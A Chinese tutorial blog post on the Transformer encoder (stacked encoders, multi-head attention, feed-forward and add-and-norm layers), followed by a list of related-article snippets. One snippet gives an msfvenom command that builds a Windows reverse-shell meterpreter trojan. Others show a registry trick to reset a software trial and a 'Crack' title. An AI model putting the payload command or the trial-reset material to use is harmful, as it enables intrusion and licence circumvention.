深入理解深度学习——Transformer:编码器(Encoder)部分
分类目录:《深入理解深度学习》总目录
Transformer中的编码器不止一个,而是由一组 N N N个编码器串联而成。一个编码器的输出作为下一个编码器的输入。在下图中有 N N N个编码器,每一个编码器都从下方接收数据,再输出给上方。以此类推,原句中的特征会由最后一个编码器输出。编码器模块的主要功能就是提取原始序列(图中为“I am good.”句子)中的特征。

需要注意的是,在Transformer原论文《Attention Is All You Need》中,作者使用了 N = 6 N=6 N=6,也就是说,一共有6个编码器叠加在一起。当然,我们可以尝试使用不同的 N N N值。这里为了方便理解,我们使用 N = 2 N=2 N=2,如下图所示。

要进一步理解编码器的工作原理,我们可以将编码器再次分解。下图展示了编码器的组成部分。由下图可知,每一个编码器的构造都是相同的,并且包含两个部分:
- 多头注意力层
- 前馈网络层

其中多头注意力层即是我们在《深入理解深度学习——注意力机制(Attention Mechanism):多头注意力(Multi-head Attention)》中介绍的多头注意力。前馈网络由两个有ReLU激活函数的全连接层组成。前馈网络的参数在句子的不同位置上是相同的,但在不同的编码器模块上是不同的。除此之外,在编码器中还有一个重要的组成部分,即叠加和归一组件。它同时连接一个子层的输入和输出,如下图所示(虚线部分),它同时连接多头注意力层的输入和输出,也同时连接前馈网络层的输入和输出。

叠加和归一组件实际上包含一个残差连接与层的归一化。层的归一化可以防止每层的值剧烈变化,从而提高了模型的训练速度。
综上所述,我们将编码器1展开可以得到如下图所示结构:

从上图中我们可以总结出以下几点:
- 将输入转换为嵌入矩阵(输入矩阵),并将位置编码加入其中,再将结果作为输入传入底层的编码器(编码器1)。
- 编码器1接受输入并将其送入多头注意力层,该子层运算后输出注意力矩阵。
- 将注意力矩阵输入到下一个子层,即前馈网络层。前馈网络层将注意力矩阵作为输入,并计算出特征值作为输出。
- 把从编码器1中得到的输出作为输入,传入下一个编码器(编码器2)。
- 编码器2进行同样的处理,再将给定输入句子的特征值作为输出。
这样可以将 N N N个编码器一个接一个地叠加起来。从最后一个编码器(顶层的编码器)得到的输出将是给定输入句子的特征值。让我们把从最后一个编码器(在本例中是编码器2)得到的特征值表示为 R R R。我们把 R R R作为输入传给解码器。解码器将基于这个输入生成目标句,这也是Transformer的编码器部分。
参考文献:
[1] Lecun Y, Bengio Y, Hinton G. Deep learning[J]. Nature, 2015
[2] Aston Zhang, Zack C. Lipton, Mu Li, Alex J. Smola. Dive Into Deep Learning[J]. arXiv preprint arXiv:2106.11342, 2021.
[3] Sudharsan Ravichandiran. BERT基础教程:Transformer大模型实战[M]. 人民邮电出版社, 2023
相关文章:
深入理解深度学习——Transformer:编码器(Encoder)部分
分类目录:《深入理解深度学习》总目录 Transformer中的编码器不止一个,而是由一组 N N N个编码器串联而成。一个编码器的输出作为下一个编码器的输入。在下图中有 N N N个编码器,每一个编码器都从下方接收数据,再输出给上方。以此…...
【图像处理】基于收缩系数的粒子群优化和引力搜索算法的多级图像阈值研究【CPSOGSA】(Matlab代码实现)
💥💥💞💞欢迎来到本博客❤️❤️💥💥 🏆博主优势:🌞🌞🌞博客内容尽量做到思维缜密,逻辑清晰,为了方便读者。 ⛳️座右铭&a…...
PortSwigger web缓存中毒(Cache Poisoning)
一、什么web缓存中毒? Web缓存中毒(Web Cache Poisoning)是一种攻击技术,攻击者通过操纵Web应用程序的缓存系统,将恶意或欺骗性内容注入到合法的缓存中,以欺骗用户或绕过安全控制。 Web缓存中毒的原理是利用…...
msf渗透练习-生成木马控制window系统
说明: 本章内容,仅供学习,不要用于非法用途(做个好白帽) (一)生成木马 命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.23.46 LPORT4444 -e x86/shikata_ga_nai -…...
【c++】组合类+继承情况下构造顺序
组合类继承情况下构造顺序 构造顺序同普通继承,先父后子,内部类是最老的(最先调用构造的)。 示例代码 class A { public:A(int a 0):_a(a){cout << "A()" << endl;}~A(){cout << "~A()" …...
盛元广通生物化学重点实验室化学品信息化安全管理系统
生物化学重点实验室是国家基础研究和高技术研究的重要基地,是培养和造就高层次创新型人才的重要基地。为保障实验室化学品安全使用,实验人员可通过现场或移动端管理系统实现化学品安全使用与存储。盛元广通生物化学重点实验室化学品信息化安全管理系统具…...
1.知识积累
(1)build_chain.sh 脚本: build_chain.sh 脚本是 FISCO BCOS 提供的一个工具脚本,用于自动化构建 FISCO BCOS 联盟链。它可以帮助您快速搭建和配置多节点的区块链网络。 具体而言,build_chain.sh 脚本的作用包括以下…...
20230612----重返学习-函数式编程-数据类型检测-网络层优化
day-090-ninety-20230612-函数式编程-数据类型检测-网络层优化 函数式编程 函数式编程 && 命令式编程 函数式编程:把具体的操作过程“封装”到一个函数中,我们无需关注内部是如何处理的(How),只需要关注处理的结果(What)即可; // 如果是依次迭代数组每一项,…...
Java实现删除txt第一行
如果您的文件很大,则可以使用以下方法在不使用临时文件或将所有内容加载到内存中的情况下执行删除. public static void removeFirstLine(String fileName) throws IOException { RandomAccessFile raf new RandomAccessFile(fileName, "rw"); …...
Go语言函数式编程库samber/lo
Go语言函数式编程库samber/lo 开发中,我们经常遇到一些操作,比如获取一个map的所有key,所有value,判断一个字符串是否出现在slice 中,slice中是否有重复元素等等。Go语言没有这样的操作,标准库也不提供。…...
自定义杰理AC63系列BLE数据发送函数
自定义BLE数据发送函数,就是将数据发送、数据发送前的检查、以及conn_handle查询等封装在一起,脱离SDK中的相关回调函数,在程序任意位置实现发送数据功能。 1. SDK中的BLE数据发送函数 BLE的数据发送函数定义在apps\common\third_party_pro…...
Jenkins结合gitee自动化部署SpringBoot项目
安装 安装教程 插件选择 Gitee Plugin 配置 源码管理 填写源码地址 注意:请确保genkins所在的服务器有权限git拉取远程仓库代码,如果不可以请参考ssh配置centos 配置ssh拉取远程git代码 源码管理 构建触发器 1.勾选Gitee webhook 触发构建 2.生成we…...
声强级和声压级之间的转换举例
声强级和声压级之间的转换举例 在学习声学时候,经常会遇到声强级和声压级的概念,而且它们的单位都是分贝(dB),很容易混淆这两个概念。而且,更容易在计算时候,不知如何转换,如何使用,本文将举例说明两者之间…...
16 粒子滤波
文章目录 16 粒子滤波16.1 背景介绍16.1.1 Particle Filter是什么?16.1.2 Patricle Filter的状态如何转移?16.1.3 如何通过采样求解Particle Filter 16.2 重要性采样16.2.1 重要性采样方法16.2.2 Sequential Importance Sampling16.2.3 Resampling16.2.4…...
【appium】appium自动化入门之API(下)——两万字API长文,建议收藏
目录 Appium API 前言 1.contexts (返回当前会话中的上下文,使用后可以识别 H5 页面的控件) 2.current_context (返回当前会话的当前上下文 ) 3. context (返回当前会话的当前上下文) 4.find_e…...
开发改了接口,经常忘通知测试的解决方案!
目录 前言: Apifox解决方案 Apifox对此给出的解决方案是: 用Apifox怎么处理接口变更 接口代码实现逻辑修改 接口参数修改 前言: 在开发过程中,接口变动十分频繁,测试人员没有及时获得相关通知的情况也很普遍。这…...
Beyond Compare 4 无法打开
解决办法: 1.修改注册表。WINR呼出开始菜单,在搜索栏中输入 regedit,点击确定。 2.删除项目:\HKEY_CURRENT_USER\Software\ScooterSoftware\Beyond Compare 4\CacheId 根据这个路径找到cacheid 右击删除掉就可以...
MySQL高级数据操作
✅作者简介:热爱Java后端开发的一名学习者,大家可以跟我一起讨论各种问题喔。 🍎个人主页:Hhzzy99 🍊个人信条:坚持就是胜利! 💞当前专栏:MySQL 🥭本文内容&a…...
硬件设计电源系列文章-DCDC转换器基础知识
文章目录 概要整体架构流程技术名词解释技术细节小结 概要 提示:这里可以添加技术概要 本文主要接着上篇,上篇文章主要讲述了LDO的相关基础知识,本节开始分享DCDC基础知识 整体架构流程 提示:这里可以添加技术整体架构 以下是…...
XdsObjects .NET 8.45.1001.0 Crack
XdsObjects 是一个工具包,允许开发人员使用 IHE XDS 和 XDS-I 配置文件开发应用程序,只需花费最少的时间和精力,因为遵守配置文件和 ebXML 规则的所有艰苦工作都由该工具包处理。 它为所有角色提供客户端和服务器支持,包括&#…...
Chapter03-Authentication vulnerabilities
文章目录 1. 身份验证简介1.1 What is authentication1.2 difference between authentication and authorization1.3 身份验证机制失效的原因1.4 身份验证机制失效的影响 2. 基于登录功能的漏洞2.1 密码爆破2.2 用户名枚举2.3 有缺陷的暴力破解防护2.3.1 如果用户登录尝试失败次…...
【杂谈】-递归进化:人工智能的自我改进与监管挑战
递归进化:人工智能的自我改进与监管挑战 文章目录 递归进化:人工智能的自我改进与监管挑战1、自我改进型人工智能的崛起2、人工智能如何挑战人类监管?3、确保人工智能受控的策略4、人类在人工智能发展中的角色5、平衡自主性与控制力6、总结与…...
Vue3 + Element Plus + TypeScript中el-transfer穿梭框组件使用详解及示例
使用详解 Element Plus 的 el-transfer 组件是一个强大的穿梭框组件,常用于在两个集合之间进行数据转移,如权限分配、数据选择等场景。下面我将详细介绍其用法并提供一个完整示例。 核心特性与用法 基本属性 v-model:绑定右侧列表的值&…...
23-Oracle 23 ai 区块链表(Blockchain Table)
小伙伴有没有在金融强合规的领域中遇见,必须要保持数据不可变,管理员都无法修改和留痕的要求。比如医疗的电子病历中,影像检查检验结果不可篡改行的,药品追溯过程中数据只可插入无法删除的特性需求;登录日志、修改日志…...
家政维修平台实战20:权限设计
目录 1 获取工人信息2 搭建工人入口3 权限判断总结 目前我们已经搭建好了基础的用户体系,主要是分成几个表,用户表我们是记录用户的基础信息,包括手机、昵称、头像。而工人和员工各有各的表。那么就有一个问题,不同的角色…...
相机从app启动流程
一、流程框架图 二、具体流程分析 1、得到cameralist和对应的静态信息 目录如下: 重点代码分析: 启动相机前,先要通过getCameraIdList获取camera的个数以及id,然后可以通过getCameraCharacteristics获取对应id camera的capabilities(静态信息)进行一些openCamera前的…...
linux 下常用变更-8
1、删除普通用户 查询用户初始UID和GIDls -l /home/ ###家目录中查看UID cat /etc/group ###此文件查看GID删除用户1.编辑文件 /etc/passwd 找到对应的行,YW343:x:0:0::/home/YW343:/bin/bash 2.将标红的位置修改为用户对应初始UID和GID: YW3…...
IoT/HCIP实验-3/LiteOS操作系统内核实验(任务、内存、信号量、CMSIS..)
文章目录 概述HelloWorld 工程C/C配置编译器主配置Makefile脚本烧录器主配置运行结果程序调用栈 任务管理实验实验结果osal 系统适配层osal_task_create 其他实验实验源码内存管理实验互斥锁实验信号量实验 CMISIS接口实验还是得JlINKCMSIS 简介LiteOS->CMSIS任务间消息交互…...
破解路内监管盲区:免布线低位视频桩重塑停车管理新标准
城市路内停车管理常因行道树遮挡、高位设备盲区等问题,导致车牌识别率低、逃费率高,传统模式在复杂路段束手无策。免布线低位视频桩凭借超低视角部署与智能算法,正成为破局关键。该设备安装于车位侧方0.5-0.7米高度,直接规避树枝遮…...
手动给中文分词和 直接用神经网络RNN做有什么区别
手动分词和基于神经网络(如 RNN)的自动分词在原理、实现方式和效果上有显著差异,以下是核心对比: 1. 实现原理对比 对比维度手动分词(规则 / 词典驱动)神经网络 RNN 分词(数据驱动)…...
